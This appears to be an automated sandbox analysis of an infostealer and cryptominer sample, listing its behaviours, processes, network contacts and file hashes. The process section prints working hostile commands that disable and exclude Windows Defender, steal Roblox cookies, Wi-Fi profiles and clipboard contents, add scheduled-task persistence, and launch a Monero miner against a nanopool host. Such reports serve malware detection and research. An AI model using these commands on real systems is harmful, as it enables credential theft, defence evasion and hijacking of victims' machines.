| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\rundii32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\munchenlatest.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\munchenlatest.exe
"C:\Users\Admin\AppData\Local\Temp\munchenlatest.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABzACMAPgA="
C:\Users\Admin\AppData\Local\Temp\rundii32.exe
"C:\Users\Admin\AppData\Local\Temp\rundii32.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcwB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdgBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABjACMAPgA="
C:\Users\Admin\AppData\Local\Temp\rundii.exe
"C:\Users\Admin\AppData\Local\Temp\rundii.exe"
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"
C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe
"C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"
C:\Users\Admin\AppData\Local\Temp\rundii.exe
"C:\Users\Admin\AppData\Local\Temp\rundii.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rundii.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rundii.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iamhdsbc\iamhdsbc.cmdline"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAFB8.tmp" "c:\Users\Admin\AppData\Local\Temp\iamhdsbc\CSC1863D5DC52D143059A9E7E5318577F36.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39882\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\xRLSp.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI39882\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI39882\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\xRLSp.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\splwow64.exe"
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\services64.exe"
C:\Users\Admin\services64.exe
C:\Users\Admin\services64.exe
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\services64.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=83bM5DoDitniDg2ooQitzWKzapHhSvJmL8kn1dDcr4ST6wU8U6Cj7TN3FRXWJK3fDXNQBRf5TQ5qN2o1aCxi7vrxSi5T26L.ObamaNet --pass=johnlovesbbc --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 216.58.204.67:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 141.94.23.83:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 83.23.94.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
memory/1792-4-0x0000000073F4E000-0x0000000073F4F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rundii32.exe
| MD5 | cac59c4e6752c4c2cecb29b5c2f9f9ac |
| SHA1 | bf9ee5e449ce94c327d6743b62feca2c85a43841 |
| SHA256 | 9d08b1a5c70870efecda2594ee777e4b18771eefb34d540109b1c45926fbf24c |
| SHA512 | 5b8aba311730202135afb4c03988f113801850e689954fbc004aa04a25d6cda8a2da2ecc63c476c620a6a2646c17241ef5780a42cb6001b1de30ec6379099431 |
memory/1032-7-0x0000000073F40000-0x00000000746F0000-memory.dmp
memory/1032-10-0x0000000002B20000-0x0000000002B56000-memory.dmp
memory/1032-11-0x0000000073F40000-0x00000000746F0000-memory.dmp
memory/1792-12-0x0000000073F40000-0x00000000746F0000-memory.dmp
memory/1032-13-0x00000000051F0000-0x0000000005818000-memory.dmp
memory/1032-14-0x0000000073F40000-0x00000000746F0000-memory.dmp
memory/1792-15-0x0000000073F40000-0x00000000746F0000-memory.dmp
memory/1032-16-0x0000000005960000-0x0000000005982000-memory.dmp
memory/1032-18-0x0000000005A80000-0x0000000005AE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\rundii.exe
| MD5 | 1f2da62acedae32686c066546b569b04 |
| SHA1 | f83b6681ef62b74a5c973f0b8bd3c89aecfd11e3 |
| SHA256 | bd40d7b888d1f01c4e45040fe80e41a1d812d3ee3e932d84f7f3540ba936c5e9 |
| SHA512 | 54bce8ec27fbb0ac6768e75f68af4e233d324ed59ec8bca19a1e738917389642e611a58a3231769eeb39a88f7e3e78cc17e09a109ab809a3bb195e1b34327bb9 |
C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe
| MD5 | 180c04a828909e35bf3d461c0eb827cc |
| SHA1 | e692112d425fc5b6adc5c7bfa1e66757bb8f8c11 |
| SHA256 | c7b5bccc8f1089f9ea3f5fb3a6dd2843bd27c2994a59d770fd4a81cc472e499b |
| SHA512 | 6dda55954d148efad2615d26a85eebef3e3ab86de484a713b1c21e4c446b652aa8ccdc7a9c49e82110632019ad87a8365a418df2e0091bcc5235a1c0f240ea04 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k554qnbx.mgw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\splwow64.exe
| MD5 | bfc16c7476c61d4b5a004ba97f5eccc3 |
| SHA1 | 7a136debf77f394b0412d979c73e4f8af8587396 |
| SHA256 | 1b343c5e48c01f376cc3887fa7000b0e69eb1894735c89b9c8d0ee1597893530 |
| SHA512 | 3766067704a96a8bef769d907d39368ed3a25bba60af32b0087ae0a411c48735741af9a804926cae93eb86f520cfbbbbbd0ebb09242977d0f07179d1a6dba17e |
memory/1792-62-0x0000000006420000-0x0000000006774000-memory.dmp
memory/1032-17-0x0000000005A10000-0x0000000005A76000-memory.dmp
memory/2936-133-0x0000000000960000-0x00000000009CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI39882\python310.dll
| MD5 | 4a6afa2200b1918c413d511c5a3c041c |
| SHA1 | 39ca3c2b669adac07d4a5eb1b3b79256cfe0c3b3 |
| SHA256 | bec187f608507b57cf0475971ba646b8ab42288af8fdcf78bce25f1d8c84b1da |
| SHA512 | dbffb06ffff0542200344ea9863a44a6f1e1b783379e53df18580e697e8204d3911e091deb32a9c94b5599cdd54301b705b74e1f51104151cf13b89d57280a20 |
memory/1308-139-0x00007FFB64210000-0x00007FFB64676000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI39882\VCRUNTIME140.dll
| MD5 | f34eb034aa4a9735218686590cba2e8b |
| SHA1 | 2bc20acdcb201676b77a66fa7ec6b53fa2644713 |
| SHA256 | 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1 |
| SHA512 | d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\_ctypes.pyd
| MD5 | 31859b9a99a29127c4236968b87dbcbb |
| SHA1 | 29b4ee82aa026c10fe8a4f43b40cbd8ec7ea71e5 |
| SHA256 | 644712c3475be7f02c2493d75e6a831372d01243aca61aa8a1418f57e6d0b713 |
| SHA512 | fec3ab9ce032e02c432d714de0d764aab83917129a5e6eeca21526b03176da68da08024d676bc0032200b2d2652e6d442ca2f1ef710a7408bd198995883a943a |
memory/1308-192-0x00007FFB7AA00000-0x00007FFB7AA0F000-memory.dmp
memory/1308-191-0x00007FFB76070000-0x00007FFB76094000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI39882\select.pyd
| MD5 | b6de7c98e66bde6ecffbf0a1397a6b90 |
| SHA1 | 63823ef106e8fd9ea69af01d8fe474230596c882 |
| SHA256 | 84b2119ed6c33dfbdf29785292a529aabbf75139d163cfbcc99805623bb3863c |
| SHA512 | 1fc26e8edc447d87a4213cb5df5d18f990bba80e5635e83193f2ae5368dd88a81fddfb4575ef4475e9bf2a6d75c5c66c8ed772496ffa761c0d8644fcf40517ca |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\libssl-1_1.dll
| MD5 | ad0a2b4286a43a0ef05f452667e656db |
| SHA1 | a8835ca75768b5756aa2445ca33b16e18ceacb77 |
| SHA256 | 2af3d965863018c66c2a9a2d66072fe3657bbd0b900473b9bbdcac8091686ae1 |
| SHA512 | cceb5ec1dd6d2801abbacd6112393fecbf5d88fe52db86cfc98f13326c3d3e31c042b0cc180b640d0f33681bdd9e6a355dc0fbfde597a323c8d9e88de40b37c4 |
memory/1308-207-0x00007FFB7A9A0000-0x00007FFB7A9B8000-memory.dmp
memory/1308-209-0x00007FFB64090000-0x00007FFB6420A000-memory.dmp
memory/1308-208-0x00007FFB75B90000-0x00007FFB75BAF000-memory.dmp
memory/1032-214-0x0000000006650000-0x000000000669C000-memory.dmp
memory/1792-213-0x0000000073F4E000-0x0000000073F4F000-memory.dmp
memory/1308-217-0x00007FFB75B40000-0x00007FFB75B6E000-memory.dmp
memory/1792-216-0x0000000073F40000-0x00000000746F0000-memory.dmp
memory/1032-215-0x0000000073F40000-0x00000000746F0000-memory.dmp
memory/1308-212-0x00007FFB7A9F0000-0x00007FFB7A9FD000-memory.dmp
memory/1308-211-0x00007FFB75B70000-0x00007FFB75B89000-memory.dmp
memory/1032-210-0x0000000006100000-0x000000000611E000-memory.dmp
memory/1308-206-0x00007FFB75E00000-0x00007FFB75E2C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI39882\libcrypto-1_1.dll
| MD5 | bbc1fcb5792f226c82e3e958948cb3c3 |
| SHA1 | 4d25857bcf0651d90725d4fb8db03ccada6540c3 |
| SHA256 | 9a36e09f111687e6b450937bb9c8aede7c37d598b1cccc1293eed2342d11cf47 |
| SHA512 | 3137be91f3393df2d56a3255281db7d4a4dccd6850eeb4f0df69d4c8dda625b85d5634fce49b195f3cc431e2245b8e9ba401baaa08778a467639ee4c1cc23d8d |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\blank.aes
| MD5 | f9f08dc29d282843e17367574d056ce2 |
| SHA1 | ca8a5f5a91d18242cedd3baec11e72a7012a24d7 |
| SHA256 | 0532bb1364b87774aafd5d7def08a84928885374364035b19c8aa9456b87c044 |
| SHA512 | 7e97a3316a4440b2a3ea90837564da7822c9e8273dca3955347849b4f3d88c708cc3f1c7b1fa13ea5997d28f7f3c1883c0d98a47d82c735a1eedc94346e8b521 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-utility-l1-1-0.dll
| MD5 | bd9a3823f7eab3959c358c9a02c07424 |
| SHA1 | 4c689623c353bffbd28c19a4b69dc85d5791b65e |
| SHA256 | 8e32928cab5e81b35b232754a5ccf78cc55d6bc8fe362a90ab6d5eab1fe8f5d9 |
| SHA512 | 16b9cdf77d83da944b56772ac78dd8af6ef94976d1468b8a32d43419487c5b0f3ff3169fb29fdeada3f64d74b8900e7833728bf332f93809cb4a8c9cf42b7f62 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 9e4620c44403dfb42d3badd40ddef313 |
| SHA1 | 0696df5c3f71aed9763408d2ab8ff8cbfd1d1a41 |
| SHA256 | 5e2f92250a058802b4a72b93226616f390044c6bfe34a04b5533773806f7072e |
| SHA512 | 5b96b4775c5fae03ba0e96d2d0f5d2fb1b4bcb05014a47686b378e11659b53a518bb56acf0d3d076ec73eadb1b639c07a6be969bd68c34f3f3ca77451f160001 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-string-l1-1-0.dll
| MD5 | 30a6e4b8fe2d9b2df594e809cbbac128 |
| SHA1 | f30559b281cb679bb406bfe42f1f501a376bca23 |
| SHA256 | f8bbf236334c083682cd710632005cb6a5a3b60086d05946827eb8ca45e24b8d |
| SHA512 | 337949c3b5a6e13ad3aae93294c5f97b6271f639e3296d4aab8ac546f4417c79c1906f92ab20955ca451d5317ba7fe64eed0c7a79309e337b20516283987c2e0 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | 41ba9068fd432758ae08d80470cff8c8 |
| SHA1 | 9de3cff0d99e3baef7ff1f45187c414c5a803a9f |
| SHA256 | 3c4f7104e8257b64b4a856c06dee4ab12e35a5bdfe361b2fc4a04a564454010b |
| SHA512 | 1d50207493b3f3a3834ef09e4f78bb03d82f2760106842e7cb57742741a1182917f3e975244543e0cef63c16ebad147e3e8b16e18d14c63dc3c906670cee7545 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | 5a04d702c462ac7b564f5da8bb35a2a0 |
| SHA1 | b8ed4c5710fb8c8ed81617c11b71b22cd57d5325 |
| SHA256 | 0210604c8dd1e9aa8c2458e2734deff9d77897d7dfce42bc0f28ad62d265bd9b |
| SHA512 | 9986cb05ca1203c086e7d4f0c4a30c6c7394d6fc4ae3908b25867f387bf61a393b054c3a9e13ba9a0d103c5b1d4be874b81dc314be611457b3bd69113d91bd3c |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-process-l1-1-0.dll
| MD5 | 1b686ce09c3d5b958b29065520a90c6f |
| SHA1 | dda2b3316f1f2c557b09fe0b8557785dd8be847c |
| SHA256 | 201b8ed6e586afb1ae44ca4da8d4a923bcf87889a8dea0c0921f995839ec41c0 |
| SHA512 | 68dc42abaecd78ce34ee0e130cc74d0932d3bf53994bd45a7f804bf3c3e59cf8125283efe67d7c12e34313401baf8a707ddb20a015fbfb9849b96870047edfe3 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-math-l1-1-0.dll
| MD5 | 8b0fe0eb8a838ea1524b9244679136ed |
| SHA1 | a32b845db57f66845e9d5f428a871eecc8900e57 |
| SHA256 | 8324e803620d6c7a57d644efb951b5b811d258f85195f71404198456d6a20da6 |
| SHA512 | a1861b8098855c1833e1e080df325ae1078ebb8918d658c7379f24f982560ab420d858be6c19353a79cbac6a4378bc23e7636f7fb7d517121cd82d924e8dcfc2 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | 3089adc12784121cdba1e6b550efd6c9 |
| SHA1 | eaa9b3760d7b25590cea4564d5dc81c86442d336 |
| SHA256 | 25420d595989c800fe5f274aebf32e74f2e670e1d08bc5336ed67de9e1b1d62c |
| SHA512 | 62d8c2f07c8670e5135b8f092b533272c87e38191ceefe03c2e6e707fa71997a68b4e00d68020aa2cf3ef6e4de1d6c7a48f1eadcd409bf6c3889f635a1f89696 |
C:\Users\Admin\AppData\Local\Temp\_MEI39882\api-ms-win-crt-heap-l1-1-0.dll
